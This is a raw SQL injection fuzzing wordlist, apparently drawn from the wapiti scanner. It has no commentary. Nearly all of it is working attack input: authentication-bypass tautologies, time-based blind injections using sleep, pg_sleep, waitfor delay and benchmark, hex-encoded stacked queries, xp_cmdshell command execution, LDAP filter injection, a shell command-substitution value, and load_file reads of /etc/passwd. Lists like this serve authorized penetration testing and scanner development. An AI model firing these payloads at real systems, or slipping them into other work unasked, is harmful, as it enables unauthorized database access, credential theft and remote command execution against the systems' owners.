0 0 or 1=1 0x730065006c0065006300740020004000400076006500 ... 0x77616974666F722064656C61792027303A303A313027 ... 0x770061006900740066006F0072002000640065006C00 ... 1 or 1=1 1 or benchmark(10000000,MD5(1))# 1 or pg_sleep(__TIME__)-- 1 or sleep(__TIME__)# 1 waitfor delay '0:0:10'-- 1)) or benchmark(10000000,MD5(1))# 1)) or pg_sleep(__TIME__)-- 1)) or sleep(__TIME__)# 1) or benchmark(10000000,MD5(1))# 1) or pg_sleep(__TIME__)-- 1) or sleep(__TIME__)# 1;(load_file(char(47,101,116,99,47,112,97,115, ... 1;SELECT%20* 3.10E+17 21 % 23 OR 1=1 26 % 28 % 29 % ! "));waitfor delay '0:0:__TIME__'-- ")) or benchmark(10000000,MD5(1))# ")) or pg_sleep(__TIME__)-- ")) or sleep(__TIME__)=" ");waitfor delay '0:0:__TIME__'-- ") or benchmark(10000000,MD5(1))# ") or pg_sleep(__TIME__)-- ") or sleep(__TIME__)=" ";waitfor delay '0:0:__TIME__'-- "a"" or 1=1--" "a"" or 3=3--" "hi"") or (""a""=""a" " or 0=0 -- " or 1=1-- " or "a"="a " or benchmark(10000000,MD5(1))# " or isNULL(1/0) /* " or pg_sleep(__TIME__)-- " or sleep(__TIME__)# # from wapiti %2A%7C %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %7C %20$(sleep%2050) %20'sleep%2050' %20or%20''=' %20or%20'x'='x %20or%20x=x %20or%201=1 %21 %26 %27%20or%201=1 %28 %29 %C0%80%27%C0%80%C0%80%C0%80O%C0%82R%C0%80%C0%801%C0%80%C0%A11 & '%20OR ' '%20or%20''=' '%20or%20'x'='x '%20or%201=1 ' (select top 1 ')%20or%20('x'='x ') or ('a'='a '; exec master..xp_cmdshell '; exec master..xp_cmdshell 'ping 172.10.1.255'-- '; exec xp_regread ' UNION ALL SELECT ' UNION SELECT 'hi' or 'x'='x'; ' or 0=0 # ' or 0=0 -- ' or 1 --' ' or 1=1 ' or 1=1 or ''=' ' or 1=1-- ' or 3=3 ' or '1'='1'-- ' or ''=' ' or (EXISTS) ' or a=a-- ' or uid like '% ' or uname like '% ' or userid like '% ' or user like '% ' or username like '% 'sqlattempt1 '||UTL_HTTP.REQUEST ( (select top 1 (sqlattempt2) (sqlvuln) (||6) ) )%20or%20('x'='x ));waitfor delay '0:0:__TIME__'-- )) or benchmark(10000000,MD5(1))# )) or pg_sleep(__TIME__)-- )) or sleep(__TIME__)=' );waitfor delay '0:0:__TIME__'-- ) or ('a'='a ) or (a=a ) or benchmark(10000000,MD5(1))# ) or pg_sleep(__TIME__)-- ) or sleep(__TIME__)=' ) union select * from information_schema.tables; *(|(mail=*)) *(|(objectclass=*)) */* *| +sqlvuln ,@variable -- -- &password= --sp_password / /**/or/**/1/**/=/**/1 // //* ; begin declare @var varchar(8000) set @var=' ... ; exec ('sel' + 'ect us' + 'er') ; exec master..xp_cmdshell ; exec master..xp_cmdshell 'ping 172.10.1.255'-- ; execute immediate 'sel' || 'ect us' || 'er' ; exec xp_regread ; or '1'='1' ;waitfor delay '0:0:__TIME__'-- <>"'%;)(&+ ? @variable @var select @var as var into temp end -- PRINT PRINT @@variable UNION ALL SELECT UNION SELECT \x27UNION SELECT a' a' or 1=1-- a' or 3=3-- a' or 'a' = 'a a' waitfor delay '0:0:10'-- admin' or ' and 1 in (select var from temp)-- and 1=( if((load_file(char(110,46,101,120,11 ... anything' OR 'x'='x as asc benchmark(10000000,MD5(1))# bfilename char%4039%41%2b%40SELECT declare @q nvarchar (200) 0x730065006c00650063 ... declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @q nvarchar (200) select @q = 0x770061 ... declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) declare @q nvarchar (4000) select @q = declare @s varchar(22) select @s = declare @s varchar (200) select @s = 0x73656c6 ... declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) declare @s varchar(200) select @s = 0x77616974 ... declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @s varchar (8000) select @s = 0x73656c ... delete desc distinct exec(@s) exec sp exec xp group by userid having 1=1-- handler having having 1=1-- hi') or ('a'='a hi' or 1=1 -- hi' or 'a'='a hi' or 'x'='x'; hi or 1=1 --" hi or a=a insert like limit or or 0=0 # or 0=0 # or 0=0 #" or 0=0 #" or 0=0 -- or 0=0 -- or 1 --' or 1 in (select @@version)-- or 1/* or 1=1 or 1=1  or 1=1 -- or 1=1 /* or 1=1 or ""= or 1=1 or ""= or 1=1 or ''=' or 1=1-- or 1=1-- or 2 > 1 or 2 between 1 and 3 or 3=3  or 3=3 -- or%201=1 or%201=1 -- or '1'='1 or '1'='1'-- or '7659'='7659 or ''=' or 'a'='a or 'something' = 'some'+'thing' or 'text' = n'text' or 'text' > 't' or 'unusual' = 'unusual' or 'whatever' in ('whatever') or (EXISTS) or a=a or a=a or a = a or a=a-- or a = a or benchmark(10000000,MD5(1))# order by or isNULL(1/0) /* or pg_sleep(__TIME__)-- or sleep(__TIME__)# or sleep(__TIME__)=' or username like char(37); password:*/=1-- pg_sleep(__TIME__)-- procedure replace select select * from information_schema.tables-- select name from syscolumns where id = (sele ... sqlvuln sqlvuln; t'exec master..xp_cmdshell 'nslookup www.googl ... t'exec master..xp_cmdshell 'nslookup www.google.com'-- to_timestamp_tz truncate tz_offset uni/**/on sel/**/ect union all select @@version-- union select union select 1,load_file('/etc/passwd'),1,1,1; union select * from users where login = char ... update x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND email IS NULL; -- x' AND members.email IS NULL; -- x' AND userid IS NULL; -- x' OR full_name LIKE '%Bob% x' or 1=1 or 'x'='y | ||6 ||'6 ||(elt(-3+5,bin(15),ord(10),hex(char(45)))) ||UTL_HTTP.REQUEST ý or 1=1 -- ‘ or 1=1 -- ‘ or 3=3 --